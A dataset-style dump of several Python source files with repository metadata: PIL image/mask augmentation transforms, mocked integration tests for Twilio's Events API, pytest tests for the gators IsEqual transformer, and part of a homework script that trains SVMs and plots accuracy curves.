| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2c4f562c61f02fc34c131715eaafaed98c5fe393
| 2,746
|
py
|
Python
|
joint_transforms.py
|
Mhaiyang/iccv
|
04a8ee52c2323d7ff5cdf03c0be1466e8180d2eb
|
[
"MIT"
] | 2
|
2019-01-10T03:44:03.000Z
|
2019-05-24T08:50:14.000Z
|
joint_transforms.py
|
Mhaiyang/iccv
|
04a8ee52c2323d7ff5cdf03c0be1466e8180d2eb
|
[
"MIT"
] | null | null | null |
joint_transforms.py
|
Mhaiyang/iccv
|
04a8ee52c2323d7ff5cdf03c0be1466e8180d2eb
|
[
"MIT"
] | null | null | null |
import random
from PIL import Image
class Compose(object):
    """Chain several joint (image, mask) transforms into one callable.

    Every transform receives and returns an ``(img, mask)`` pair, so the
    output of each stage feeds the next.
    """

    def __init__(self, transforms):
        # ordered sequence of joint-transform callables
        self.transforms = transforms

    def __call__(self, img, mask):
        assert img.size == mask.size
        current_img, current_mask = img, mask
        for transform in self.transforms:
            current_img, current_mask = transform(current_img, current_mask)
        return current_img, current_mask
class RandomRotate(object):
    """Randomly flip an (image, mask) pair left-right with probability 0.5.

    Despite the name, the 90/180/270-degree rotation branches of the
    original implementation were disabled; only the horizontal flip is
    active.  A single random draw is consumed per call so the image and
    mask always receive the same decision.
    """

    def __call__(self, img, mask):
        if random.random() < 0.5:
            flip = Image.FLIP_LEFT_RIGHT
            return img.transpose(flip), mask.transpose(flip)
        return img, mask
class Resize(object):
    """Resize an (image, mask) pair to a fixed size.

    The size is supplied as (h, w) but PIL expects (w, h), so it is
    reversed once at construction time.  The image is resampled with
    bilinear interpolation while the mask uses nearest-neighbor so that
    label values are preserved.
    """

    def __init__(self, size):
        # size arrives as (h, w); PIL wants (w, h)
        self.size = tuple(reversed(size))

    def __call__(self, img, mask):
        assert img.size == mask.size
        resized_img = img.resize(self.size, Image.BILINEAR)
        resized_mask = mask.resize(self.size, Image.NEAREST)
        return resized_img, resized_mask
# class Compose(object):
# def __init__(self, transforms):
# self.transforms = transforms
#
# def __call__(self, img, mask, edge):
# assert img.size == mask.size
# assert img.size == edge.size
# for t in self.transforms:
# img, mask, edge = t(img, mask, edge)
# return img, mask, edge
#
#
# class RandomRotate(object):
# def __call__(self, img, mask, edge):
# p = random.random()
# # rotate
# # if p < 0.25:
# # return img.transpose(Image.ROTATE_90), mask.transpose(Image.ROTATE_90), edge.transpose(Image.ROTATE_90)
# # if p < 0.5:
# # return img.transpose(Image.ROTATE_180), mask.transpose(Image.ROTATE_180), edge.transpose(Image.ROTATE_180)
# # if p < 0.75:
# # return img.transpose(Image.ROTATE_270), mask.transpose(Image.ROTATE_270), edge.transpose(Image.ROTATE_270)
#
# # # flip
# if p < 0.5:
# return img.transpose(Image.FLIP_LEFT_RIGHT), mask.transpose(Image.FLIP_LEFT_RIGHT), \
# edge.transpose(Image.FLIP_LEFT_RIGHT)
#
# return img, mask, edge
#
#
# class Resize(object):
# def __init__(self, size):
# self.size = tuple(reversed(size)) # size: (h, w) PIL: (w, h)
#
# def __call__(self, img, mask, edge):
# assert img.size == mask.size
# assert img.size == edge.size
# return img.resize(self.size, Image.BILINEAR), mask.resize(self.size, Image.NEAREST), \
# edge.resize(self.size, Image.NEAREST)
| 32.690476
| 122
| 0.595047
| 354
| 2,746
| 4.432203
| 0.124294
| 0.178458
| 0.191205
| 0.117272
| 0.944551
| 0.914595
| 0.912046
| 0.912046
| 0.791587
| 0.791587
| 0
| 0.030045
| 0.27276
| 2,746
| 83
| 123
| 33.084337
| 0.755633
| 0.644574
| 0
| 0.318182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.227273
| false
| 0
| 0.090909
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
2ca246063dfed062b2b4d4cb42d89d0a88bacbde
| 6,848
|
py
|
Python
|
tests/integration/events/v1/test_event_type.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 1,362
|
2015-01-04T10:25:18.000Z
|
2022-03-24T10:07:08.000Z
|
tests/integration/events/v1/test_event_type.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 299
|
2015-01-30T09:52:39.000Z
|
2022-03-31T23:03:02.000Z
|
tests/integration/events/v1/test_event_type.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 622
|
2015-01-03T04:43:09.000Z
|
2022-03-29T14:11:00.000Z
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class EventTypeTestCase(IntegrationTestCase):
    """Integration tests for the Events v1 EventType REST resource.

    Request-shaped tests mock a 500 response so the client raises after
    sending, then assert on the emitted request; response-shaped tests
    feed a canned JSON payload back and check the client parses it.
    """
    def test_list_request(self):
        """Listing event types issues GET /v1/Types."""
        self.holodeck.mock(Response(500, ''))
        with self.assertRaises(TwilioException):
            self.client.events.v1.event_types.list()
        self.holodeck.assert_has_request(Request(
            'get',
            'https://events.twilio.com/v1/Types',
        ))
    def test_read_empty_response(self):
        """An empty page of types parses without error."""
        self.holodeck.mock(Response(
            200,
            '''
            {
                "types": [],
                "meta": {
                    "page": 0,
                    "page_size": 10,
                    "first_page_url": "https://events.twilio.com/v1/Types?PageSize=10&Page=0",
                    "previous_page_url": null,
                    "url": "https://events.twilio.com/v1/Types?PageSize=10&Page=0",
                    "next_page_url": null,
                    "key": "types"
                }
            }
            '''
        ))
        actual = self.client.events.v1.event_types.list()
        self.assertIsNotNone(actual)
    def test_read_results_response(self):
        """A populated page of types parses without error."""
        self.holodeck.mock(Response(
            200,
            '''
            {
                "types": [
                    {
                        "date_created": "2020-08-13T13:28:20Z",
                        "date_updated": "2020-08-13T13:28:20Z",
                        "type": "com.twilio.messaging.message.delivered",
                        "schema_id": "Messaging.MessageStatus",
                        "public": true,
                        "description": "Messaging- delivered message",
                        "url": "https://events.twilio.com/v1/Types/com.twilio.messaging.message.delivered",
                        "links": {
                            "schema": "https://events.twilio.com/v1/Schemas/Messaging.MessageStatus/Versions"
                        }
                    },
                    {
                        "date_created": "2020-08-13T13:28:19Z",
                        "date_updated": "2020-08-13T13:28:19Z",
                        "type": "com.twilio.messaging.message.failed",
                        "schema_id": "Messaging.MessageStatus",
                        "public": true,
                        "description": "Messaging- failed message",
                        "url": "https://events.twilio.com/v1/Types/com.twilio.messaging.message.failed",
                        "links": {
                            "schema": "https://events.twilio.com/v1/Schemas/Messaging.MessageStatus/Versions"
                        }
                    }
                ],
                "meta": {
                    "page": 0,
                    "page_size": 20,
                    "first_page_url": "https://events.twilio.com/v1/Types?PageSize=20&Page=0",
                    "previous_page_url": null,
                    "url": "https://events.twilio.com/v1/Types?PageSize=20&Page=0",
                    "next_page_url": null,
                    "key": "types"
                }
            }
            '''
        ))
        actual = self.client.events.v1.event_types.list()
        self.assertIsNotNone(actual)
    def test_read_results_with_schema_id_response(self):
        """A page filtered by SchemaId parses without error."""
        self.holodeck.mock(Response(
            200,
            '''
            {
                "types": [
                    {
                        "date_created": "2020-08-13T13:28:20Z",
                        "date_updated": "2020-08-13T13:28:20Z",
                        "type": "com.twilio.messaging.message.delivered",
                        "schema_id": "Messaging.MessageStatus",
                        "public": true,
                        "description": "Messaging- delivered message",
                        "url": "https://events.twilio.com/v1/Types/com.twilio.messaging.message.delivered",
                        "links": {
                            "schema": "https://events.twilio.com/v1/Schemas/Messaging.MessageStatus/Versions"
                        }
                    },
                    {
                        "date_created": "2020-08-13T13:28:19Z",
                        "date_updated": "2020-08-13T13:28:19Z",
                        "type": "com.twilio.messaging.message.failed",
                        "schema_id": "Messaging.MessageStatus",
                        "public": true,
                        "description": "Messaging- failed message",
                        "url": "https://events.twilio.com/v1/Types/com.twilio.messaging.message.failed",
                        "links": {
                            "schema": "https://events.twilio.com/v1/Schemas/Messaging.MessageStatus/Versions"
                        }
                    }
                ],
                "meta": {
                    "page": 0,
                    "page_size": 20,
                    "first_page_url": "https://events.twilio.com/v1/Types?SchemaId=Messaging.MessageStatus&PageSize=20&Page=0",
                    "previous_page_url": null,
                    "url": "https://events.twilio.com/v1/Types?SchemaId=Messaging.MessageStatus&PageSize=20&Page=0",
                    "next_page_url": null,
                    "key": "types"
                }
            }
            '''
        ))
        actual = self.client.events.v1.event_types.list()
        self.assertIsNotNone(actual)
    def test_fetch_request(self):
        """Fetching a single event type issues GET /v1/Types/{type}."""
        self.holodeck.mock(Response(500, ''))
        with self.assertRaises(TwilioException):
            self.client.events.v1.event_types("type").fetch()
        self.holodeck.assert_has_request(Request(
            'get',
            'https://events.twilio.com/v1/Types/type',
        ))
    def test_fetch_response(self):
        """A single event type payload parses without error."""
        self.holodeck.mock(Response(
            200,
            '''
            {
                "date_created": "2020-08-13T13:28:20Z",
                "date_updated": "2020-08-13T13:28:20Z",
                "type": "com.twilio.messaging.message.delivered",
                "schema_id": "Messaging.MessageStatus",
                "public": true,
                "description": "Messaging- delivered message",
                "url": "https://events.twilio.com/v1/Types/com.twilio.messaging.message.delivered",
                "links": {
                    "schema": "https://events.twilio.com/v1/Schemas/Messaging.MessageStatus/Versions"
                }
            }
            '''
        ))
        actual = self.client.events.v1.event_types("type").fetch()
        self.assertIsNotNone(actual)
| 38.044444
| 127
| 0.467874
| 591
| 6,848
| 5.2978
| 0.143824
| 0.063239
| 0.097732
| 0.114979
| 0.902268
| 0.896838
| 0.896838
| 0.882466
| 0.867135
| 0.851166
| 0
| 0.052002
| 0.401869
| 6,848
| 179
| 128
| 38.256983
| 0.712402
| 0.015917
| 0
| 0.630435
| 1
| 0
| 0.049771
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 1
| 0.130435
| false
| 0
| 0.086957
| 0
| 0.23913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cbeab9c2464e33c517b99aa99ac5d2959c336a8
| 8,457
|
py
|
Python
|
gators/feature_generation/tests/test_is_equal.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 4
|
2021-10-29T18:20:52.000Z
|
2022-03-31T22:53:03.000Z
|
gators/feature_generation/tests/test_is_equal.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 1
|
2022-02-21T20:02:16.000Z
|
2022-02-21T20:02:16.000Z
|
gators/feature_generation/tests/test_is_equal.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 5
|
2021-11-17T20:16:54.000Z
|
2022-02-21T18:21:02.000Z
|
# License: Apache-2.0
import databricks.koalas as ks
import numpy as np
import pandas as pd
import pytest
from pandas.testing import assert_frame_equal
from gators.feature_generation.is_equal import IsEqual
ks.set_option("compute.default_index_type", "distributed-sequence")
@pytest.fixture
def data():
    """Pandas frame, fitted IsEqual transformer, and expected output."""
    frame = pd.DataFrame(
        {"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
    )
    expected = pd.DataFrame(
        {
            "A": [99.0, 1.0, 2.0],
            "B": [99.0, 4.0, 5.0],
            "C": [99.0, 7.0, 8.0],
            "A__is__B": [1.0, 0.0, 0.0],
            "A__is__C": [1.0, 0.0, 0.0],
        }
    )
    transformer = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(frame)
    return transformer, frame, expected
@pytest.fixture
def data_int16():
    """Same as ``data`` but with every frame cast to int16."""
    frame = pd.DataFrame(
        {"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
    ).astype(np.int16)
    expected = pd.DataFrame(
        {
            "A": [99.0, 1.0, 2.0],
            "B": [99.0, 4.0, 5.0],
            "C": [99.0, 7.0, 8.0],
            "A__is__B": [1.0, 0.0, 0.0],
            "A__is__C": [1.0, 0.0, 0.0],
        }
    ).astype(np.int16)
    transformer = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(frame)
    return transformer, frame, expected
@pytest.fixture
def data_obj():
    """Object-dtype (string) columns plus one integer column."""
    frame = pd.DataFrame(
        {
            "A": ["a", "b", "c"],
            "B": ["a", "f", "e"],
            "C": ["a", "p", "d"],
            "D": [1, 2, 3],
        }
    )
    expected = pd.DataFrame(
        {
            "A": ["a", "b", "c"],
            "B": ["a", "f", "e"],
            "C": ["a", "p", "d"],
            "D": [1, 2, 3],
            "A__is__B": [1.0, 0.0, 0.0],
            "A__is__C": [1.0, 0.0, 0.0],
        }
    )
    transformer = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(frame)
    return transformer, frame, expected
@pytest.fixture
def data_names():
    """Fixture exercising user-supplied output column names."""
    frame = pd.DataFrame(
        {"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
    )
    expected = pd.DataFrame(
        {
            "A": [99.0, 1.0, 2.0],
            "B": [99.0, 4.0, 5.0],
            "C": [99.0, 7.0, 8.0],
            "A==B": [1.0, 0.0, 0.0],
            "A==C": [1.0, 0.0, 0.0],
        }
    )
    transformer = IsEqual(
        columns_a=list("AA"), columns_b=list("BC"), column_names=["A==B", "A==C"]
    ).fit(frame)
    return transformer, frame, expected
@pytest.fixture
def data_ks():
    """Koalas input frame with a pandas expected-output frame."""
    frame = ks.DataFrame(
        {"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
    )
    expected = pd.DataFrame(
        {
            "A": [99.0, 1.0, 2.0],
            "B": [99.0, 4.0, 5.0],
            "C": [99.0, 7.0, 8.0],
            "A__is__B": [1.0, 0.0, 0.0],
            "A__is__C": [1.0, 0.0, 0.0],
        }
    )
    transformer = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(frame)
    return transformer, frame, expected
@pytest.fixture
def data_int16_ks():
    """Koalas int16 input frame with a pandas int16 expected frame."""
    frame = ks.DataFrame(
        {"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
    ).astype(np.int16)
    expected = pd.DataFrame(
        {
            "A": [99.0, 1.0, 2.0],
            "B": [99.0, 4.0, 5.0],
            "C": [99.0, 7.0, 8.0],
            "A__is__B": [1.0, 0.0, 0.0],
            "A__is__C": [1.0, 0.0, 0.0],
        }
    ).astype(np.int16)
    transformer = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(frame)
    return transformer, frame, expected
@pytest.fixture
def data_obj_ks():
    """Koalas object-dtype input with a pandas expected frame."""
    frame = ks.DataFrame(
        {
            "A": ["a", "b", "c"],
            "B": ["a", "f", "e"],
            "C": ["a", "p", "d"],
            "D": [1, 2, 3],
        }
    )
    expected = pd.DataFrame(
        {
            "A": ["a", "b", "c"],
            "B": ["a", "f", "e"],
            "C": ["a", "p", "d"],
            "D": [1, 2, 3],
            "A__is__B": [1.0, 0.0, 0.0],
            "A__is__C": [1.0, 0.0, 0.0],
        }
    )
    transformer = IsEqual(columns_a=list("AA"), columns_b=list("BC")).fit(frame)
    return transformer, frame, expected
@pytest.fixture
def data_names_ks():
    """Koalas variant of ``data_names`` with custom output column names."""
    frame = ks.DataFrame(
        {"A": [99.0, 1.0, 2.0], "B": [99.0, 4.0, 5.0], "C": [99.0, 7.0, 8.0]}
    )
    expected = pd.DataFrame(
        {
            "A": [99.0, 1.0, 2.0],
            "B": [99.0, 4.0, 5.0],
            "C": [99.0, 7.0, 8.0],
            "A==B": [1.0, 0.0, 0.0],
            "A==C": [1.0, 0.0, 0.0],
        }
    )
    transformer = IsEqual(
        columns_a=list("AA"), columns_b=list("BC"), column_names=["A==B", "A==C"]
    ).fit(frame)
    return transformer, frame, expected
def test_pd(data):
obj, X, X_expected = data
X_new = obj.transform(X)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_ks(data_ks):
    """Koalas transform output equals the expected pandas frame."""
    transformer, frame, expected = data_ks
    result = transformer.transform(frame)
    assert_frame_equal(result.to_pandas(), expected)
def test_pd_np(data):
obj, X, X_expected = data
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values.astype(np.float64))
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_ks_np(data_ks):
    """Koalas numpy-path output equals the expected values as float64."""
    transformer, frame, expected = data_ks
    result = pd.DataFrame(transformer.transform_numpy(frame.to_numpy()))
    assert_frame_equal(result, pd.DataFrame(expected.values.astype(np.float64)))
def test_int16_pd(data_int16):
obj, X, X_expected = data_int16
X_new = obj.transform(X)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_int16_ks(data_int16_ks):
    """Koalas int16 transform output equals the expected pandas frame."""
    transformer, frame, expected = data_int16_ks
    result = transformer.transform(frame)
    assert_frame_equal(result.to_pandas(), expected)
def test_int16_pd_np(data_int16):
obj, X, X_expected = data_int16
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_int16_ks_np(data_int16_ks):
    """Koalas numpy-path int16 output equals the expected values."""
    transformer, frame, expected = data_int16_ks
    result = pd.DataFrame(transformer.transform_numpy(frame.to_numpy()))
    assert_frame_equal(result, pd.DataFrame(expected.values))
def test_obj(data_obj):
obj, X, X_expected = data_obj
X_new = obj.transform(X)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_obj_ks(data_obj_ks):
    """Koalas object-dtype transform output equals the expected frame."""
    transformer, frame, expected = data_obj_ks
    result = transformer.transform(frame)
    assert_frame_equal(result.to_pandas(), expected)
def test_obj_np(data_obj):
obj, X, X_expected = data_obj
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_obj_ks_np(data_obj_ks):
    """Koalas numpy-path object-dtype output equals the expected values."""
    transformer, frame, expected = data_obj_ks
    result = pd.DataFrame(transformer.transform_numpy(frame.to_numpy()))
    assert_frame_equal(result, pd.DataFrame(expected.values))
def test_names_pd(data_names):
obj, X, X_expected = data_names
X_new = obj.transform(X)
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_names_ks(data_names_ks):
    """Koalas custom-column-name output equals the expected frame."""
    transformer, frame, expected = data_names_ks
    result = transformer.transform(frame)
    assert_frame_equal(result.to_pandas(), expected)
def test_names_pd_np(data_names):
obj, X, X_expected = data_names
X_numpy_new = obj.transform_numpy(X.to_numpy())
X_new = pd.DataFrame(X_numpy_new)
X_expected = pd.DataFrame(X_expected.values.astype(np.float64))
assert_frame_equal(X_new, X_expected)
@pytest.mark.koalas
def test_names_ks_np(data_names_ks):
    """Koalas numpy-path custom-name output equals expected as float64."""
    transformer, frame, expected = data_names_ks
    result = pd.DataFrame(transformer.transform_numpy(frame.to_numpy()))
    assert_frame_equal(result, pd.DataFrame(expected.values.astype(np.float64)))
def test_input():
    """Constructor rejects wrong argument types and mismatched list lengths."""
    for bad_kwargs in (
        dict(columns_a=0, columns_b=["B"]),
        dict(columns_a=["A"], columns_b=0),
        dict(columns_a=["A"], columns_b=["B"], column_names=0),
    ):
        with pytest.raises(TypeError):
            _ = IsEqual(**bad_kwargs)
    for bad_kwargs in (
        dict(columns_a=["A"], columns_b=["B", "C"]),
        dict(columns_a=["A"], columns_b=["B"], column_names=["x", "y"]),
        dict(columns_a=[], columns_b=[]),
    ):
        with pytest.raises(ValueError):
            _ = IsEqual(**bad_kwargs)
| 27.192926
| 81
| 0.554334
| 1,414
| 8,457
| 3.062235
| 0.053748
| 0.133025
| 0.033256
| 0.029561
| 0.933487
| 0.928406
| 0.92194
| 0.893533
| 0.893533
| 0.83649
| 0
| 0.065138
| 0.257538
| 8,457
| 310
| 82
| 27.280645
| 0.624462
| 0.002247
| 0
| 0.722222
| 0
| 0
| 0.036155
| 0.003082
| 0
| 0
| 0
| 0
| 0.06746
| 1
| 0.099206
| false
| 0
| 0.02381
| 0
| 0.154762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cbf45500ead174aee8c0ff61d6bc27efc4de5a9
| 40,132
|
py
|
Python
|
hw3/normal_part.py
|
shinshiner/CS420-Machine-Learning
|
dacb1b5e5caef2be523a0b56af81db3f449049d0
|
[
"MIT"
] | 6
|
2019-05-07T02:38:43.000Z
|
2022-03-14T07:46:59.000Z
|
hw3/normal_part.py
|
shinshiner/CS420-Machine-Learning
|
dacb1b5e5caef2be523a0b56af81db3f449049d0
|
[
"MIT"
] | null | null | null |
hw3/normal_part.py
|
shinshiner/CS420-Machine-Learning
|
dacb1b5e5caef2be523a0b56af81db3f449049d0
|
[
"MIT"
] | null | null | null |
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.svm import SVC
from sklearn.neural_network import MLPClassifier
from sklearn.decomposition import PCA
from sklearn.feature_selection import SelectKBest, f_classif, chi2, f_regression
import numpy as np
import matplotlib.pyplot as plt
# Step (and first value) of the max_iter sweep used by svm() and mlp().
interval = 15
# Largest max_iter in the sweep; range(interval, max_iter + 1, interval)
# gives the 10 evaluation points plotted below.
max_iter = 150
def pca(x, n_components=9):
    """Project x onto its leading principal components.

    Generalizes the previously hard-coded 9-component reduction; the
    default preserves the original behaviour. Prints the total explained
    variance ratio of the retained components as a side effect.

    Args:
        x: 2-D feature array (samples x features).
        n_components: number of principal components to keep.

    Returns:
        The transformed (samples x n_components) array.
    """
    model = PCA(n_components=n_components)
    data = model.fit_transform(x)
    print(model.explained_variance_ratio_.sum())
    return data
def select(x, y, k=10, score_func=f_classif):
    """Keep the k features with the highest univariate scores.

    Generalizes the previously hard-coded SelectKBest(f_classif, k=10);
    the defaults preserve the original behaviour.

    Args:
        x: 2-D feature array (samples x features).
        y: target labels consumed by the scoring function.
        k: number of features to retain.
        score_func: scoring callable accepted by SelectKBest.

    Returns:
        x reduced to its k best-scoring columns.
    """
    selector = SelectKBest(score_func=score_func, k=k)
    real_features = selector.fit_transform(x, y)
    return real_features
################################### SVM Part #####################################
def svm(data_name):
    """Train rbf-kernel SVMs with a growing iteration budget and print scores.

    Loads 'data/<data_name>_feature.npy' / '_target.npy' (train) and the
    matching '.t_*' files (test), fits an SVC for each max_iter in
    range(interval, max_iter + 1, interval), and prints the rounded
    train/test accuracy lists.

    Args:
        data_name: dataset file prefix under 'data/' (e.g. 'madelon').
    """
    # load data
    x_tr = np.load('data/' + data_name + '_feature.npy')
    y_tr = np.load('data/' + data_name + '_target.npy')
    x_t = np.load('data/' + data_name + '.t_feature.npy')
    y_t = np.load('data/' + data_name + '.t_target.npy')
    if data_name == 'madelon':
        # Bug fix: fit the scaler on the training split only and reuse it
        # for the test split. The original re-fit a scaler on x_t, which
        # leaks test-set statistics and scales the two splits inconsistently.
        scaler = StandardScaler()
        scaler.fit(x_tr)
        x_tr = scaler.transform(x_tr)
        x_t = scaler.transform(x_t)
    res_tr = []
    res_t = []
    # training stage
    for i in range(interval, max_iter + 1, interval):
        model = SVC(C=1.0, cache_size=200, class_weight=None, coef0=0.0,
                    decision_function_shape='ovr', degree=3, gamma='auto', kernel='rbf',
                    max_iter=i, probability=False, shrinking=True,
                    tol=0.001, verbose=False, random_state=666)
        model.fit(x_tr, y_tr)
        res_tr.append(round(model.score(x_tr, y_tr), 3))
        res_t.append(round(model.score(x_t, y_t), 3))
    print('train: ', res_tr)
    print('test: ', res_t)
def plot_s_kernel_splice():
    """Accuracy-vs-iterations curves for four SVM kernels on splice.

    The accuracies are hard-coded results of earlier SVC runs (C=1.0,
    gamma='auto', random_state=666, kernel varied). One figure is saved
    per data split.
    """
    x = list(range(interval, max_iter + 1, interval))
    train_series = [
        ([0.612, 0.598, 0.633, 0.547, 0.577, 0.599, 0.645, 0.558, 0.589, 0.607], '#90EE90', 'no kernel'),
        ([0.579, 0.67, 0.718, 0.725, 0.739, 0.767, 0.798, 0.834, 0.864, 0.848], '#ffa07a', '3-polynomial'),
        ([0.659, 0.719, 0.821, 0.865, 0.894, 0.937, 0.952, 0.981, 0.989, 0.998], '#9999ff', 'rbf'),
        ([0.498, 0.489, 0.488, 0.488, 0.491, 0.491, 0.492, 0.492, 0.492, 0.491], '#F0E68C', 'sigmoid'),
    ]
    test_series = [
        ([0.63, 0.583, 0.65, 0.556, 0.575, 0.589, 0.656, 0.558, 0.62, 0.594], '#90EE90', 'no kernel'),
        ([0.559, 0.694, 0.69, 0.695, 0.733, 0.73, 0.732, 0.781, 0.798, 0.793], '#ffa07a', '3-polynomial'),
        ([0.64, 0.7, 0.774, 0.783, 0.813, 0.844, 0.834, 0.869, 0.874, 0.887], '#9999ff', 'rbf'),
        ([0.475, 0.456, 0.453, 0.455, 0.456, 0.456, 0.457, 0.457, 0.457, 0.459], '#F0E68C', 'sigmoid'),
    ]
    for series, out_path in ((train_series, 'report/img/svm_kernel_splice_tr'),
                             (test_series, 'report/img/svm_kernel_splice_t')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Draw all lines first, then all markers, to keep the original order.
        for ys, color, label in series:
            ax.plot(x, ys, color=color, linewidth=1.7, label=label)
        for ys, color, _ in series:
            ax.scatter(x, ys, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
def plot_s_kernel_sat():
    """Accuracy-vs-iterations curves for four SVM kernels on sat.

    The accuracies are hard-coded results of earlier SVC runs (C=1.0,
    gamma='auto', random_state=666, kernel varied). One figure is saved
    per data split.
    """
    x = list(range(interval, max_iter + 1, interval))
    train_series = [
        ([0.633, 0.726, 0.801, 0.655, 0.665, 0.808, 0.833, 0.826, 0.853, 0.857], '#90EE90', 'no kernel'),
        ([0.642, 0.664, 0.658, 0.638, 0.651, 0.661, 0.664, 0.693, 0.68, 0.644], '#ffa07a', '3-polynomial'),
        ([0.688, 0.685, 0.676, 0.715, 0.582, 0.624, 0.783, 0.823, 0.826, 0.828], '#9999ff', 'rbf'),
        ([0.657, 0.706, 0.647, 0.681, 0.679, 0.648, 0.683, 0.776, 0.78, 0.798], '#F0E68C', 'sigmoid'),
    ]
    test_series = [
        ([0.56, 0.673, 0.776, 0.662, 0.684, 0.78, 0.796, 0.796, 0.806, 0.825], '#90EE90', 'no kernel'),
        ([0.632, 0.656, 0.652, 0.644, 0.652, 0.66, 0.666, 0.688, 0.674, 0.657], '#ffa07a', '3-polynomial'),
        ([0.664, 0.682, 0.656, 0.707, 0.608, 0.63, 0.764, 0.795, 0.798, 0.804], '#9999ff', 'rbf'),
        ([0.659, 0.696, 0.646, 0.674, 0.688, 0.666, 0.688, 0.749, 0.748, 0.764], '#F0E68C', 'sigmoid'),
    ]
    for series, out_path in ((train_series, 'report/img/svm_kernel_sat_tr'),
                             (test_series, 'report/img/svm_kernel_sat_t')):
        plt.figure(figsize=(6, 4))
        ax = plt.gca()
        # Draw all lines first, then all markers, to keep the original order.
        for ys, color, label in series:
            ax.plot(x, ys, color=color, linewidth=1.7, label=label)
        for ys, color, _ in series:
            ax.scatter(x, ys, s=13, c=color)
        ax.grid(color='b', alpha=0.5, linestyle='dashed', linewidth=0.5)
        plt.xlabel('Iterations')
        plt.ylabel('Accuracy')
        plt.legend()
        plt.savefig(out_path)
        plt.show()
# poly kernel results: kernel_num (2-10)
# splice: tr:[0.852, 0.947, 0.983, 0.99, 0.99, 0.993, 0.99, 0.989, 0.983]
# t:[0.786, 0.857, 0.865, 0.871, 0.88, 0.874, 0.864, 0.867, 0.851]
# sat: tr:[0.651, 0.672, 0.492, 0.553, 0.475, 0.511, 0.471, 0.524, 0.373]
# t:[0.635, 0.666, 0.505, 0.554, 0.488, 0.512, 0.477, 0.528, 0.403]
def plot_s_dim_splice():
    """SVM accuracy vs. iterations for several feature-subset sizes (splice).

    Hard-coded results of rbf-kernel SVC runs on 25/50/75/100% of the
    features; one figure per data split.
    """
    x = list(range(interval, max_iter + 1, interval))
    train_series = [
        ([0.615, 0.75, 0.749, 0.831, 0.853, 0.855, 0.891, 0.942, 0.965, 0.97], '#90EE90', '25% features'),
